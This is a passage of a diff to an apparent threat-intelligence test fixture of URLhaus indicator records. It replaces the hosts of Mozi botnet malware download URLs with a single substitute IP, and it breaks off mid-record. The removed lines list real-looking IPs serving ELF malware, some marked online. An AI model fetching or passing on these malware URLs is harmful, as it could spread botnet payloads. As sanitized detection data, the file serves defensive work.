@@ -22572,18 +22572,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://49.77.198.90:52540/Mozi.a", + "original": "http://89.160.20.156:52540/Mozi.a", "scheme": "http", "port": 52540, - "domain": "49.77.198.90", - "full": "http://49.77.198.90:52540/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52540/Mozi.a" }, - "ip": "49.77.198.90" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694249554Z", - "original": "{\"id\":\"961082\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961082/\",\"url\":\"http://49.77.198.90:52540/Mozi.a\",\"url_status\":\"online\",\"host\":\"49.77.198.90\",\"date_added\":\"2021-01-14 17:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027900700Z", + "original": "{\"id\":\"961082\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961082/\",\"url\":\"http://89.160.20.156:52540/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22621,18 +22621,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.96.27.213:56964/Mozi.m", + "original": "http://89.160.20.156:56964/Mozi.m", "scheme": "http", "port": 56964, - "domain": "59.96.27.213", - "full": "http://59.96.27.213:56964/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56964/Mozi.m" }, - "ip": "59.96.27.213" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694252750Z", - "original": "{\"id\":\"961081\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961081/\",\"url\":\"http://59.96.27.213:56964/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.96.27.213\",\"date_added\":\"2021-01-14 17:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027907600Z", + "original": "{\"id\":\"961081\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961081/\",\"url\":\"http://89.160.20.156:56964/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22670,18 +22670,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.52.62.80:57120/Mozi.m", + "original": "http://89.160.20.156:57120/Mozi.m", "scheme": "http", "port": 57120, - "domain": "61.52.62.80", - "full": "http://61.52.62.80:57120/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57120/Mozi.m" }, - "ip": "61.52.62.80" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694255856Z", - "original": "{\"id\":\"961078\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961078/\",\"url\":\"http://61.52.62.80:57120/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.52.62.80\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027914500Z", + "original": "{\"id\":\"961078\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961078/\",\"url\":\"http://89.160.20.156:57120/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22719,18 +22719,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://58.248.113.219:44518/Mozi.a", + "original": "http://89.160.20.156:44518/Mozi.a", "scheme": "http", "port": 44518, - "domain": "58.248.113.219", - "full": "http://58.248.113.219:44518/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44518/Mozi.a" }, - "ip": "58.248.113.219" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694259012Z", - "original": "{\"id\":\"961079\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961079/\",\"url\":\"http://58.248.113.219:44518/Mozi.a\",\"url_status\":\"online\",\"host\":\"58.248.113.219\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027921400Z", + "original": "{\"id\":\"961079\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961079/\",\"url\":\"http://89.160.20.156:44518/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22768,18 +22768,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://58.249.22.124:50389/Mozi.m", + "original": "http://89.160.20.156:50389/Mozi.m", "scheme": "http", "port": 50389, - "domain": "58.249.22.124", - "full": "http://58.249.22.124:50389/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50389/Mozi.m" }, - "ip": "58.249.22.124" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694262218Z", - "original": "{\"id\":\"961080\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961080/\",\"url\":\"http://58.249.22.124:50389/Mozi.m\",\"url_status\":\"online\",\"host\":\"58.249.22.124\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027928600Z", + "original": "{\"id\":\"961080\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961080/\",\"url\":\"http://89.160.20.156:50389/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:07:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22817,18 +22817,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.241.176:34335/Mozi.m", + "original": "http://89.160.20.156:34335/Mozi.m", "scheme": "http", "port": 34335, - "domain": "42.224.241.176", - "full": "http://42.224.241.176:34335/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:34335/Mozi.m" }, - "ip": "42.224.241.176" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694265344Z", - "original": "{\"id\":\"961077\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961077/\",\"url\":\"http://42.224.241.176:34335/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.241.176\",\"date_added\":\"2021-01-14 17:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027936600Z", + "original": "{\"id\":\"961077\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961077/\",\"url\":\"http://89.160.20.156:34335/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22866,18 +22866,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.234.234.40:54865/Mozi.m", + "original": "http://89.160.20.156:54865/Mozi.m", "scheme": "http", "port": 54865, - "domain": "42.234.234.40", - "full": "http://42.234.234.40:54865/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:54865/Mozi.m" }, - "ip": "42.234.234.40" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694268470Z", - "original": "{\"id\":\"961069\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961069/\",\"url\":\"http://42.234.234.40:54865/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.234.234.40\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027943600Z", + "original": "{\"id\":\"961069\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961069/\",\"url\":\"http://89.160.20.156:54865/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22915,18 +22915,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://27.41.216.92:50773/Mozi.a", + "original": "http://89.160.20.156:50773/Mozi.a", "scheme": "http", "port": 50773, - "domain": "27.41.216.92", - "full": "http://27.41.216.92:50773/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:50773/Mozi.a" }, - "ip": "27.41.216.92" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694271556Z", - "original": "{\"id\":\"961070\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961070/\",\"url\":\"http://27.41.216.92:50773/Mozi.a\",\"url_status\":\"online\",\"host\":\"27.41.216.92\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027950600Z", + "original": "{\"id\":\"961070\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961070/\",\"url\":\"http://89.160.20.156:50773/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -22964,18 +22964,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.237.56.242:52005/Mozi.m", + "original": "http://89.160.20.156:52005/Mozi.m", "scheme": "http", "port": 52005, - "domain": "42.237.56.242", - "full": "http://42.237.56.242:52005/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52005/Mozi.m" }, - "ip": "42.237.56.242" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694274832Z", - "original": "{\"id\":\"961071\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961071/\",\"url\":\"http://42.237.56.242:52005/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.237.56.242\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.027957400Z", + "original": "{\"id\":\"961071\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961071/\",\"url\":\"http://89.160.20.156:52005/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23013,18 +23013,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.139.126.241:56066/Mozi.m", + "original": "http://89.160.20.156:56066/Mozi.m", "scheme": "http", "port": 56066, - "domain": "222.139.126.241", - "full": "http://222.139.126.241:56066/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:56066/Mozi.m" }, - "ip": "222.139.126.241" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694278188Z", - "original": "{\"id\":\"961072\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961072/\",\"url\":\"http://222.139.126.241:56066/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.139.126.241\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028000500Z", + "original": "{\"id\":\"961072\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961072/\",\"url\":\"http://89.160.20.156:56066/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23062,18 +23062,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.137.133.120:32915/Mozi.m", + "original": "http://89.160.20.156:32915/Mozi.m", "scheme": "http", "port": 32915, - "domain": "222.137.133.120", - "full": "http://222.137.133.120:32915/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32915/Mozi.m" }, - "ip": "222.137.133.120" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694281985Z", - "original": "{\"id\":\"961073\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961073/\",\"url\":\"http://222.137.133.120:32915/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.137.133.120\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028008900Z", + "original": "{\"id\":\"961073\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961073/\",\"url\":\"http://89.160.20.156:32915/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23111,18 +23111,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://222.137.123.31:43462/Mozi.a", + "original": "http://89.160.20.156:43462/Mozi.a", "scheme": "http", "port": 43462, - "domain": "222.137.123.31", - "full": "http://222.137.123.31:43462/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43462/Mozi.a" }, - "ip": "222.137.123.31" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694286534Z", - "original": "{\"id\":\"961074\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961074/\",\"url\":\"http://222.137.123.31:43462/Mozi.a\",\"url_status\":\"online\",\"host\":\"222.137.123.31\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028016100Z", + "original": "{\"id\":\"961074\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961074/\",\"url\":\"http://89.160.20.156:43462/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23160,18 +23160,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://219.157.163.74:33291/Mozi.m", + "original": "http://89.160.20.156:33291/Mozi.m", "scheme": "http", "port": 33291, - "domain": "219.157.163.74", - "full": "http://219.157.163.74:33291/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33291/Mozi.m" }, - "ip": "219.157.163.74" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694290181Z", - "original": "{\"id\":\"961075\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961075/\",\"url\":\"http://219.157.163.74:33291/Mozi.m\",\"url_status\":\"online\",\"host\":\"219.157.163.74\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028023Z", + "original": "{\"id\":\"961075\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961075/\",\"url\":\"http://89.160.20.156:33291/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23209,18 +23209,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://220.125.119.222:1440/Mozi.m", + "original": "http://89.160.20.156:1440/Mozi.m", "scheme": "http", "port": 1440, - "domain": "220.125.119.222", - "full": "http://220.125.119.222:1440/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:1440/Mozi.m" }, - "ip": "220.125.119.222" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694294699Z", - "original": "{\"id\":\"961076\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961076/\",\"url\":\"http://220.125.119.222:1440/Mozi.m\",\"url_status\":\"offline\",\"host\":\"220.125.119.222\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028030Z", + "original": "{\"id\":\"961076\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961076/\",\"url\":\"http://89.160.20.156:1440/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:06:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23258,18 +23258,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://123.10.35.174:55907/Mozi.a", + "original": "http://89.160.20.156:55907/Mozi.a", "scheme": "http", "port": 55907, - "domain": "123.10.35.174", - "full": "http://123.10.35.174:55907/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55907/Mozi.a" }, - "ip": "123.10.35.174" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694298056Z", - "original": "{\"id\":\"961068\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961068/\",\"url\":\"http://123.10.35.174:55907/Mozi.a\",\"url_status\":\"online\",\"host\":\"123.10.35.174\",\"date_added\":\"2021-01-14 17:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028036800Z", + "original": "{\"id\":\"961068\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961068/\",\"url\":\"http://89.160.20.156:55907/Mozi.a\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:07 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23307,18 +23307,18 @@ "url": { "path": "/Mozi.a", "extension": "a", - "original": "http://117.247.201.31:33181/Mozi.a", + "original": "http://89.160.20.156:33181/Mozi.a", "scheme": "http", "port": 33181, - "domain": "117.247.201.31", - "full": "http://117.247.201.31:33181/Mozi.a" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:33181/Mozi.a" }, - "ip": "117.247.201.31" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694301552Z", - "original": "{\"id\":\"961066\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961066/\",\"url\":\"http://117.247.201.31:33181/Mozi.a\",\"url_status\":\"offline\",\"host\":\"117.247.201.31\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028043900Z", + "original": "{\"id\":\"961066\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961066/\",\"url\":\"http://89.160.20.156:33181/Mozi.a\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23356,18 +23356,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://182.121.150.204:44691/Mozi.m", + "original": "http://89.160.20.156:44691/Mozi.m", "scheme": "http", "port": 44691, - "domain": "182.121.150.204", - "full": "http://182.121.150.204:44691/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44691/Mozi.m" }, - "ip": "182.121.150.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694305399Z", - "original": "{\"id\":\"961067\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961067/\",\"url\":\"http://182.121.150.204:44691/Mozi.m\",\"url_status\":\"online\",\"host\":\"182.121.150.204\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028050800Z", + "original": "{\"id\":\"961067\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961067/\",\"url\":\"http://89.160.20.156:44691/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23405,18 +23405,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://125.42.26.224:55254/Mozi.m", + "original": "http://89.160.20.156:55254/Mozi.m", "scheme": "http", "port": 55254, - "domain": "125.42.26.224", - "full": "http://125.42.26.224:55254/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:55254/Mozi.m" }, - "ip": "125.42.26.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694309086Z", - "original": "{\"id\":\"961059\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961059/\",\"url\":\"http://125.42.26.224:55254/Mozi.m\",\"url_status\":\"online\",\"host\":\"125.42.26.224\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028057700Z", + "original": "{\"id\":\"961059\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961059/\",\"url\":\"http://89.160.20.156:55254/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -23454,18 +23454,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.123.24:43010/Mozi.m", + "original": "http://89.160.20.156:43010/Mozi.m", "scheme": "http", "port": 43010, - "domain": "186.33.123.24", - "full": "http://186.33.123.24:43010/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:43010/Mozi.m" }, - "ip": "186.33.123.24" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694313104Z", - "original": "{\"id\":\"961060\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/961060/\",\"url\":\"http://186.33.123.24:43010/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.24\",\"date_added\":\"2021-01-14 17:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028065200Z", + "original": 